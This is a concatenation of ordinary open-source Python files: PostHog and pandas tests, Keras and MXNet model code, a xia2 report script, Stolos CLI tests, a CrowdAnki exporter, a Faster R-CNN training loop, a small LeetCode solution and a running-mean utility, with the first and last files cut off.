self.assertEqual(Dispatcher._getattr_function(Math(), "diff")(3, 2), 1)
self.assertEqual(Dispatcher._getattr_function(Math(), "mul")(3, 2), 6)
|
16573
|
from datetime import datetime
from django.db import connection
from posthog.models import Person
from posthog.test.base import BaseTest
# How we expect this function to behave:
# | call | value exists | call TS is ___ existing TS | previous fn | write/override
# 1| set | no | N/A | N/A | yes
# 2| set_once | no | N/A | N/A | yes
# 3| set | yes | before | set | no
# 4| set | yes | before | set_once | yes
# 5| set | yes | after | set | yes
# 6| set | yes | after | set_once | yes
# 7| set_once | yes | before | set | no
# 8| set_once | yes | before | set_once | yes
# 9| set_once | yes | after | set | no
# 10| set_once | yes | after | set_once | no
# 11| set | yes | equal | set | no
# 12| set_once | yes | equal | set | no
# 13| set | yes | equal | set_once | yes
# 14| set_once | yes | equal | set_once | no
FUTURE_TIMESTAMP = datetime(2050, 1, 1, 1, 1, 1).isoformat()
PAST_TIMESTAMP = datetime(2000, 1, 1, 1, 1, 1).isoformat()
# Refers to migration 0176_update_person_props_function
# This is a Postgres function we use in the plugin server
class TestShouldUpdatePersonProp(BaseTest):
def test_update_without_properties_last_updated_at(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# dont update set_once call
self.assertEqual(updated_person.properties, {"a": 1, "b": 0})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set_once"})
self.assertIsNotNone(updated_person.properties_last_updated_at["a"])
def test_update_without_properties_last_operation(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": FUTURE_TIMESTAMP, "b": FUTURE_TIMESTAMP,},
properties_last_operation={},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# dont update set_once call
self.assertEqual(updated_person.properties, {"a": 1, "b": 0})
self.assertEqual(updated_person.properties_last_operation, {"a": "set"})
self.assertNotEqual(updated_person.properties_last_updated_at["a"], FUTURE_TIMESTAMP)
# tests cases 1 and 2 from the table
def test_update_non_existent_prop(self):
person = Person.objects.create(
team=self.team, properties={}, properties_last_updated_at={}, properties_last_operation={}
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# both updated
self.assertEqual(updated_person.properties, {"a": 1, "b": 1})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set_once"})
self.assertIsNotNone(updated_person.properties_last_updated_at["a"])
self.assertIsNotNone(updated_person.properties_last_updated_at["b"])
# # tests cases 3 and 4 from the table
def test_set_operation_with_earlier_timestamp(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": FUTURE_TIMESTAMP, "b": FUTURE_TIMESTAMP,},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# b updated
self.assertEqual(updated_person.properties, {"a": 0, "b": 1})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set"})
self.assertEqual(updated_person.properties_last_updated_at["a"], FUTURE_TIMESTAMP)
self.assertNotEqual(updated_person.properties_last_updated_at["b"], FUTURE_TIMESTAMP)
# # tests cases 5 and 6 from the table
def test_set_operation_with_older_timestamp(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": PAST_TIMESTAMP, "b": PAST_TIMESTAMP,},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# both updated
self.assertEqual(updated_person.properties, {"a": 1, "b": 1})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set"})
self.assertNotEqual(updated_person.properties_last_updated_at["a"], PAST_TIMESTAMP)
self.assertNotEqual(updated_person.properties_last_updated_at["b"], PAST_TIMESTAMP)
# tests cases 7 and 8 from the table
def test_set_once_operation_with_earlier_timestamp(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": FUTURE_TIMESTAMP, "b": FUTURE_TIMESTAMP,},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set_once', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# b updated
self.assertEqual(updated_person.properties, {"a": 0, "b": 1})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set_once"})
self.assertEqual(updated_person.properties_last_updated_at["a"], FUTURE_TIMESTAMP)
self.assertNotEqual(updated_person.properties_last_updated_at["b"], FUTURE_TIMESTAMP)
# tests cases 9 and 10 from the table
def test_set_once_operation_with_older_timestamp(self):
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0},
properties_last_updated_at={"a": PAST_TIMESTAMP, "b": PAST_TIMESTAMP,},
properties_last_operation={"a": "set", "b": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
now()::text,
array[
row('set_once', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# neither updated
self.assertEqual(updated_person.properties, {"a": 0, "b": 0})
self.assertEqual(updated_person.properties_last_operation, {"a": "set", "b": "set_once"})
self.assertEqual(updated_person.properties_last_updated_at["a"], PAST_TIMESTAMP)
self.assertEqual(updated_person.properties_last_updated_at["b"], PAST_TIMESTAMP)
# # tests cases 11-14 from the table
def test_equal_timestamps(self):
timestamp = PAST_TIMESTAMP
person = Person.objects.create(
team=self.team,
properties={"a": 0, "b": 0, "c": 0, "d": 0},
properties_last_updated_at={"a": timestamp, "b": timestamp, "c": timestamp, "d": timestamp},
properties_last_operation={"a": "set", "b": "set", "c": "set_once", "d": "set_once"},
)
with connection.cursor() as cursor:
cursor.execute(
f"""
SELECT update_person_props(
{person.id},
'{timestamp}',
array[
row('set', 'a', '1'::jsonb)::person_property_update,
row('set_once', 'b', '1'::jsonb)::person_property_update,
row('set', 'c', '1'::jsonb)::person_property_update,
row('set_once', 'd', '1'::jsonb)::person_property_update
]
)
"""
)
updated_person = Person.objects.get(id=person.id)
# update if current op is set and last op is set_once i.e. "c"
self.assertEqual(updated_person.properties, {"a": 0, "b": 0, "c": 1, "d": 0})
self.assertEqual(
updated_person.properties_last_operation, {"a": "set", "b": "set", "c": "set", "d": "set_once"}
) # c changed
self.assertEqual(updated_person.properties_last_updated_at["a"], PAST_TIMESTAMP)
self.assertEqual(updated_person.properties_last_updated_at["b"], PAST_TIMESTAMP)
self.assertEqual(updated_person.properties_last_updated_at["c"], PAST_TIMESTAMP)
self.assertEqual(updated_person.properties_last_updated_at["c"], PAST_TIMESTAMP)
|
16583
|
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Flatten, Dropout, Input
from tensorflow.keras.layers import MaxPooling1D, Conv1D
from tensorflow.keras.layers import LSTM, Bidirectional
from tensorflow.keras.layers import BatchNormalization, GlobalAveragePooling1D, Permute, concatenate, Activation, add
import numpy as np
import math
def get_model(model_name, input_shape, nb_class):
if model_name == "vgg":
model = cnn_vgg(input_shape, nb_class)
elif model_name == "lstm1":
model = lstm1(input_shape, nb_class)
elif model_name == "lstm":
model = lstm1v0(input_shape, nb_class)
elif model_name == "lstm2":
model = lstm2(input_shape, nb_class)
elif model_name == "blstm1":
model = blstm1(input_shape, nb_class)
elif model_name == "blstm2":
model = blstm2(input_shape, nb_class)
elif model_name == "lstmfcn":
model = lstm_fcn(input_shape, nb_class)
elif model_name == "resnet":
model = cnn_resnet(input_shape, nb_class)
elif model_name == "mlp":
model = mlp4(input_shape, nb_class)
elif model_name == "lenet":
model = cnn_lenet(input_shape, nb_class)
else:
print("model name missing")
return model
def mlp4(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, "Time Series Classification from Scratch with Deep Neural Networks: A Strong Baseline," Int. Joint Conf. Neural Networks, 2017, pp. 1578-1585
ip = Input(shape=input_shape)
fc = Flatten()(ip)
fc = Dropout(0.1)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.2)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.2)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.3)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def cnn_lenet(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, and <NAME>, “Gradient-based learning applied to document recognition,” Proceedings of the IEEE, vol. 86, no. 11, pp. 2278–2324, 1998.
ip = Input(shape=input_shape)
conv = ip
nb_cnn = int(round(math.log(input_shape[0], 2))-3)
print("pooling layers: %d"%nb_cnn)
for i in range(nb_cnn):
conv = Conv1D(6+10*i, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = MaxPooling1D(pool_size=2)(conv)
flat = Flatten()(conv)
fc = Dense(120, activation='relu')(flat)
fc = Dropout(0.5)(fc)
fc = Dense(84, activation='relu')(fc)
fc = Dropout(0.5)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def cnn_vgg(input_shape, nb_class):
# <NAME> and <NAME>, "Very deep convolutional networks for large-scale image recognition," arXiv preprint arXiv:1409.1556, 2014.
ip = Input(shape=input_shape)
conv = ip
nb_cnn = int(round(math.log(input_shape[0], 2))-3)
print("pooling layers: %d"%nb_cnn)
for i in range(nb_cnn):
num_filters = min(64*2**i, 512)
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
if i > 1:
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = MaxPooling1D(pool_size=2)(conv)
flat = Flatten()(conv)
fc = Dense(4096, activation='relu')(flat)
fc = Dropout(0.5)(fc)
fc = Dense(4096, activation='relu')(fc)
fc = Dropout(0.5)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def lstm1v0(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Long Short-Term Memory,” Neural Computation, vol. 9, no. 8, pp. 1735–1780, Nov. 1997.
ip = Input(shape=input_shape)
l2 = LSTM(512)(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm1(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Long Short-Term Memory,” Neural Computation, vol. 9, no. 8, pp. 1735–1780, Nov. 1997.
# Hyperparameter choices:
# <NAME> and <NAME>, "Optimal hyperparameters for deep lstm-networks for sequence labeling tasks," arXiv, preprint arXiv:1707.06799, 2017
ip = Input(shape=input_shape)
l2 = LSTM(100)(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm2(input_shape, nb_class):
ip = Input(shape=input_shape)
l1 = LSTM(100, return_sequences=True)(ip)
l2 = LSTM(100)(l1)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def blstm1(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Bidirectional recurrent neural networks,” IEEE Transactions on Signal Processing, vol. 45, no. 11, pp. 2673–2681, 1997.
# Hyperparameter choices:
# <NAME> and <NAME>, "Optimal hyperparameters for deep lstm-networks for sequence labeling tasks," arXiv, preprint arXiv:1707.06799, 2017
ip = Input(shape=input_shape)
l2 = Bidirectional(LSTM(100))(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def blstm2(input_shape, nb_class):
ip = Input(shape=input_shape)
l1 = Bidirectional(LSTM(100, return_sequences=True))(ip)
l2 = Bidirectional(LSTM(100))(l1)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm_fcn(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, and <NAME>, “LSTM Fully Convolutional Networks for Time Series Classification,” IEEE Access, vol. 6, pp. 1662–1669, 2018.
ip = Input(shape=input_shape)
# lstm part is a 1 time step multivariate as described in Karim et al. Seems strange, but works I guess.
lstm = Permute((2, 1))(ip)
lstm = LSTM(128)(lstm)
lstm = Dropout(0.8)(lstm)
conv = Conv1D(128, 8, padding='same', kernel_initializer='he_uniform')(ip)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
flat = GlobalAveragePooling1D()(conv)
flat = concatenate([lstm, flat])
out = Dense(nb_class, activation='softmax')(flat)
model = Model([ip], [out])
model.summary()
return model
def cnn_resnet(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, "Data augmentation using synthetic data for time series classification with deep residual networks," International Workshop on Advanced Analytics and Learning on Temporal Data ECML/PKDD, 2018
ip = Input(shape=input_shape)
residual = ip
conv = ip
for i, nb_nodes in enumerate([64, 128, 128]):
conv = Conv1D(nb_nodes, 8, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(nb_nodes, 5, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(nb_nodes, 3, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
if i < 2:
# expands dimensions according to Fawaz et al.
residual = Conv1D(nb_nodes, 1, padding='same', kernel_initializer="glorot_uniform")(residual)
residual = BatchNormalization()(residual)
conv = add([residual, conv])
conv = Activation('relu')(conv)
residual = conv
flat = GlobalAveragePooling1D()(conv)
out = Dense(nb_class, activation='softmax')(flat)
model = Model([ip], [out])
model.summary()
return model
|
16590
|
import json
import os
import sys
from collections import OrderedDict
import iotbx.phil
import xia2.Handlers.Streams
from dials.util.options import OptionParser
from jinja2 import ChoiceLoader, Environment, PackageLoader
from xia2.Modules.Report import Report
from xia2.XIA2Version import Version
phil_scope = iotbx.phil.parse(
"""\
title = 'xia2 report'
.type = str
prefix = 'xia2'
.type = str
log_include = None
.type = path
include scope xia2.Modules.Analysis.phil_scope
json {
indent = None
.type = int(value_min=0)
}
""",
process_includes=True,
)
help_message = """
"""
def run(args):
usage = "xia2.report [options] scaled_unmerged.mtz"
parser = OptionParser(
usage=usage, phil=phil_scope, check_format=False, epilog=help_message
)
params, options, args = parser.parse_args(
show_diff_phil=True, return_unhandled=True
)
if len(args) == 0:
parser.print_help()
return
unmerged_mtz = args[0]
report = Report.from_unmerged_mtz(unmerged_mtz, params, report_dir=".")
# xtriage
xtriage_success, xtriage_warnings, xtriage_danger = None, None, None
if params.xtriage_analysis:
try:
xtriage_success, xtriage_warnings, xtriage_danger = report.xtriage_report()
except Exception as e:
params.xtriage_analysis = False
print("Exception runnning xtriage:")
print(e)
json_data = {}
if params.xtriage_analysis:
json_data["xtriage"] = xtriage_success + xtriage_warnings + xtriage_danger
(
overall_stats_table,
merging_stats_table,
stats_plots,
) = report.resolution_plots_and_stats()
json_data.update(stats_plots)
json_data.update(report.batch_dependent_plots())
json_data.update(report.intensity_stats_plots(run_xtriage=False))
json_data.update(report.pychef_plots())
resolution_graphs = OrderedDict(
(k, json_data[k])
for k in (
"cc_one_half",
"i_over_sig_i",
"second_moments",
"wilson_intensity_plot",
"completeness",
"multiplicity_vs_resolution",
)
if k in json_data
)
if params.include_radiation_damage:
batch_graphs = OrderedDict(
(k, json_data[k])
for k in (
"scale_rmerge_vs_batch",
"i_over_sig_i_vs_batch",
"completeness_vs_dose",
"rcp_vs_dose",
"scp_vs_dose",
"rd_vs_batch_difference",
)
)
else:
batch_graphs = OrderedDict(
(k, json_data[k])
for k in ("scale_rmerge_vs_batch", "i_over_sig_i_vs_batch")
)
misc_graphs = OrderedDict(
(k, json_data[k])
for k in ("cumulative_intensity_distribution", "l_test", "multiplicities")
if k in json_data
)
for k, v in report.multiplicity_plots().items():
misc_graphs[k] = {"img": v}
styles = {}
for axis in ("h", "k", "l"):
styles["multiplicity_%s" % axis] = "square-plot"
loader = ChoiceLoader(
[PackageLoader("xia2", "templates"), PackageLoader("dials", "templates")]
)
env = Environment(loader=loader)
if params.log_include:
with open(params.log_include, "rb") as fh:
log_text = fh.read().decode("utf-8")
else:
log_text = ""
template = env.get_template("report.html")
html = template.render(
page_title=params.title,
filename=os.path.abspath(unmerged_mtz),
space_group=report.intensities.space_group_info().symbol_and_number(),
unit_cell=str(report.intensities.unit_cell()),
mtz_history=[h.strip() for h in report.mtz_object.history()],
xtriage_success=xtriage_success,
xtriage_warnings=xtriage_warnings,
xtriage_danger=xtriage_danger,
overall_stats_table=overall_stats_table,
merging_stats_table=merging_stats_table,
cc_half_significance_level=params.cc_half_significance_level,
resolution_graphs=resolution_graphs,
batch_graphs=batch_graphs,
misc_graphs=misc_graphs,
styles=styles,
xia2_version=Version,
log_text=log_text,
)
with open("%s-report.json" % params.prefix, "w") as fh:
json.dump(json_data, fh, indent=params.json.indent)
with open("%s-report.html" % params.prefix, "wb") as fh:
fh.write(html.encode("utf-8", "xmlcharrefreplace"))
def run_with_log():
xia2.Handlers.Streams.setup_logging(
logfile="xia2.report.txt", debugfile="xia2.report-debug.txt"
)
run(sys.argv[1:])
|
16627
|
import pytest
from pandas.errors import NullFrequencyError
import pandas as pd
from pandas import TimedeltaIndex
import pandas._testing as tm
class TestTimedeltaIndexShift:
# -------------------------------------------------------------
# TimedeltaIndex.shift is used by __add__/__sub__
def test_tdi_shift_empty(self):
# GH#9903
idx = pd.TimedeltaIndex([], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="H"), idx)
tm.assert_index_equal(idx.shift(3, freq="H"), idx)
def test_tdi_shift_hours(self):
# GH#9903
idx = pd.TimedeltaIndex(["5 hours", "6 hours", "9 hours"], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="H"), idx)
exp = pd.TimedeltaIndex(["8 hours", "9 hours", "12 hours"], name="xxx")
tm.assert_index_equal(idx.shift(3, freq="H"), exp)
exp = pd.TimedeltaIndex(["2 hours", "3 hours", "6 hours"], name="xxx")
tm.assert_index_equal(idx.shift(-3, freq="H"), exp)
def test_tdi_shift_minutes(self):
# GH#9903
idx = pd.TimedeltaIndex(["5 hours", "6 hours", "9 hours"], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="T"), idx)
exp = pd.TimedeltaIndex(["05:03:00", "06:03:00", "9:03:00"], name="xxx")
tm.assert_index_equal(idx.shift(3, freq="T"), exp)
exp = pd.TimedeltaIndex(["04:57:00", "05:57:00", "8:57:00"], name="xxx")
tm.assert_index_equal(idx.shift(-3, freq="T"), exp)
def test_tdi_shift_int(self):
# GH#8083
tdi = pd.to_timedelta(range(5), unit="d")
trange = tdi._with_freq("infer") + pd.offsets.Hour(1)
result = trange.shift(1)
expected = TimedeltaIndex(
[
"1 days 01:00:00",
"2 days 01:00:00",
"3 days 01:00:00",
"4 days 01:00:00",
"5 days 01:00:00",
],
freq="D",
)
tm.assert_index_equal(result, expected)
def test_tdi_shift_nonstandard_freq(self):
# GH#8083
tdi = pd.to_timedelta(range(5), unit="d")
trange = tdi._with_freq("infer") + pd.offsets.Hour(1)
result = trange.shift(3, freq="2D 1s")
expected = TimedeltaIndex(
[
"6 days 01:00:03",
"7 days 01:00:03",
"8 days 01:00:03",
"9 days 01:00:03",
"10 days 01:00:03",
],
freq="D",
)
tm.assert_index_equal(result, expected)
def test_shift_no_freq(self):
# GH#19147
tdi = TimedeltaIndex(["1 days 01:00:00", "2 days 01:00:00"], freq=None)
with pytest.raises(NullFrequencyError, match="Cannot shift with no freq"):
tdi.shift(2)
|
16629
|
import os
from subprocess import check_output, CalledProcessError
from nose import tools as nt
from stolos import queue_backend as qb
from stolos.testing_tools import (
with_setup, validate_zero_queued_task, validate_one_queued_task,
validate_n_queued_task
)
def run(cmd, tasks_json_tmpfile, **kwargs):
cmd = (
"set -o pipefail ; STOLOS_TASKS_JSON={tasks_json} {cmd}").format(
cmd=cmd, tasks_json=tasks_json_tmpfile, **kwargs)
rv = check_output(cmd, shell=True, executable="bash", env=os.environ)
return rv
@with_setup
def test_stolos_submit(app1, job_id1, tasks_json_tmpfile):
with nt.assert_raises(CalledProcessError):
run("stolos-submit -h", tasks_json_tmpfile)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s" % (app1, job_id1), tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
run("stolos-submit -a %s -j %s" % (app1, job_id1), tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
@with_setup
def test_stolos_submit_readd(app1, job_id1, tasks_json_tmpfile):
qb.set_state(app1, job_id1, failed=True)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s" % (app1, job_id1),
tasks_json_tmpfile)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s --readd" % (app1, job_id1),
tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
@with_setup
def test_stolos_submit_multiple_jobs(app1, app2, job_id1, job_id2,
tasks_json_tmpfile):
validate_zero_queued_task(app1)
validate_zero_queued_task(app2)
run("stolos-submit -a %s %s -j %s %s" % (app1, app2, job_id1, job_id2),
tasks_json_tmpfile)
validate_n_queued_task(app1, job_id1, job_id2)
validate_n_queued_task(app2, job_id1, job_id2)
run("stolos-submit -a %s %s -j %s %s" % (app1, app2, job_id1, job_id2),
tasks_json_tmpfile)
validate_n_queued_task(app1, job_id1, job_id2)
validate_n_queued_task(app2, job_id1, job_id2)
|
16633
|
from pathlib import Path
from .anki_exporter import AnkiJsonExporter
from ..anki.adapters.anki_deck import AnkiDeck
from ..config.config_settings import ConfigSettings
from ..utils import constants
from ..utils.notifier import AnkiModalNotifier, Notifier
from ..utils.disambiguate_uuids import disambiguate_note_model_uuids
EXPORT_FAILED_TITLE = "Export failed"
class AnkiJsonExporterWrapper:
"""
Wrapper designed to work with standard export dialog in anki.
"""
key = "CrowdAnki JSON representation"
ext = constants.ANKI_EXPORT_EXTENSION
hideTags = True
includeTags = True
directory_export = True
def __init__(self, collection,
deck_id: int = None,
json_exporter: AnkiJsonExporter = None,
notifier: Notifier = None):
self.includeMedia = True
self.did = deck_id
self.count = 0 # Todo?
self.collection = collection
self.anki_json_exporter = json_exporter or AnkiJsonExporter(collection, ConfigSettings.get_instance())
self.notifier = notifier or AnkiModalNotifier()
# required by anki exporting interface with its non-PEP-8 names
# noinspection PyPep8Naming
def exportInto(self, directory_path):
if self.did is None:
self.notifier.warning(EXPORT_FAILED_TITLE, "CrowdAnki export works only for specific decks. "
"Please use CrowdAnki snapshot if you want to export "
"the whole collection.")
return
deck = AnkiDeck(self.collection.decks.get(self.did, default=False))
if deck.is_dynamic:
self.notifier.warning(EXPORT_FAILED_TITLE, "CrowdAnki does not support export for dynamic decks.")
return
# Clean up duplicate note models. See
# https://github.com/Stvad/CrowdAnki/wiki/Workarounds-%E2%80%94-Duplicate-note-model-uuids.
disambiguate_note_model_uuids(self.collection)
# .parent because we receive name with random numbers at the end (hacking around internals of Anki) :(
export_path = Path(directory_path).parent
self.anki_json_exporter.export_to_directory(deck, export_path, self.includeMedia,
create_deck_subdirectory=ConfigSettings.get_instance().export_create_deck_subdirectory)
self.count = self.anki_json_exporter.last_exported_count
def get_exporter_id(exporter):
return f"{exporter.key} (*{exporter.ext})", exporter
def exporters_hook(exporters_list):
exporter_id = get_exporter_id(AnkiJsonExporterWrapper)
if exporter_id not in exporters_list:
exporters_list.append(exporter_id)
|
16719
|
import numpy as np
import tensorflow as tf
from keras import backend as K
from tqdm import tqdm
def write_log(callback, names, logs, batch_no):
for name, value in zip(names, logs):
summary = tf.Summary()
summary_value = summary.value.add()
summary_value.simple_value = value
summary_value.tag = name
callback.writer.add_summary(summary, batch_no)
callback.writer.flush()
def fit_one_epoch(model_rpn, model_all, loss_history, callback, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, anchors, bbox_util, roi_helper):
total_loss = 0
rpn_loc_loss = 0
rpn_cls_loss = 0
roi_loc_loss = 0
roi_cls_loss = 0
val_loss = 0
with tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen):
if iteration >= epoch_step:
break
X, Y, boxes = batch[0], batch[1], batch[2]
P_rpn = model_rpn.predict_on_batch(X)
results = bbox_util.detection_out_rpn(P_rpn, anchors)
roi_inputs = []
out_classes = []
out_regrs = []
for i in range(len(X)):
R = results[i]
X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i])
roi_inputs.append(X2)
out_classes.append(Y1)
out_regrs.append(Y2)
loss_class = model_all.train_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)])
write_log(callback, ['total_loss','rpn_cls_loss', 'rpn_reg_loss', 'detection_cls_loss', 'detection_reg_loss'], loss_class, iteration)
rpn_cls_loss += loss_class[1]
rpn_loc_loss += loss_class[2]
roi_cls_loss += loss_class[3]
roi_loc_loss += loss_class[4]
total_loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss
pbar.set_postfix(**{'total' : total_loss / (iteration + 1),
'rpn_cls' : rpn_cls_loss / (iteration + 1),
'rpn_loc' : rpn_loc_loss / (iteration + 1),
'roi_cls' : roi_cls_loss / (iteration + 1),
'roi_loc' : roi_loc_loss / (iteration + 1),
'lr' : K.get_value(model_rpn.optimizer.lr)})
pbar.update(1)
print('Start Validation')
with tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen_val):
if iteration >= epoch_step_val:
break
X, Y, boxes = batch[0], batch[1], batch[2]
P_rpn = model_rpn.predict_on_batch(X)
results = bbox_util.detection_out_rpn(P_rpn, anchors)
roi_inputs = []
out_classes = []
out_regrs = []
for i in range(len(X)):
R = results[i]
X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i])
roi_inputs.append(X2)
out_classes.append(Y1)
out_regrs.append(Y2)
loss_class = model_all.test_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)])
val_loss += loss_class[0]
pbar.set_postfix(**{'total' : val_loss / (iteration + 1)})
pbar.update(1)
logs = {'loss': total_loss / epoch_step, 'val_loss': val_loss / epoch_step_val}
loss_history.on_epoch_end([], logs)
print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))
print('Total Loss: %.3f || Val Loss: %.3f ' % (total_loss / epoch_step, val_loss / epoch_step_val))
model_all.save_weights('logs/ep%03d-loss%.3f-val_loss%.3f.h5' % (epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val))
|
16750
|
class Solution:
def subtractProductAndSum(self, n: int) -> int:
x = n
add = 0
mul = 1
while x > 0 :
add += x%10
mul *= x%10
x = x//10
return mul - add
|
16756
|
from typing import Tuple
import torch
class RunningMeanStd:
"""
Utility Function to compute a running mean and variance calculator
:param epsilon: Small number to prevent division by zero for calculations
:param shape: Shape of the RMS object
:type epsilon: float
:type shape: Tuple
"""
def __init__(self, epsilon: float = 1e-4, shape: Tuple = ()):
self.mean = torch.zeros(shape).double()
self.var = torch.ones(shape).double()
self.count = epsilon
def update(self, batch: torch.Tensor):
batch_mean = torch.mean(batch, axis=0)
batch_var = torch.var(batch, axis=0)
batch_count = batch.shape[0]
total_count = self.count + batch_count
delta = batch_mean - self.mean
new_mean = self.mean + delta * batch_count / total_count
M2 = (
self.var * self.count
+ batch_var * batch_count
+ (delta ** 2) * self.count * batch_count / total_count
)
self.mean = new_mean
self.var = M2 / (total_count - 1)
self.count = total_count
|
16796
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import mxnet as mx
import numpy as np
from config import config
def Conv(**kwargs):
body = mx.sym.Convolution(**kwargs)
return body
def Act(data, act_type, name):
if act_type=='prelu':
body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)
else:
body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
return body
def ConvFactory(data, num_filter, kernel, stride=(1, 1), pad=(0, 0), act_type="relu", mirror_attr={}, with_act=True, dcn=False, name=''):
bn_mom = config.bn_mom
workspace = config.workspace
if not dcn:
conv = mx.symbol.Convolution(
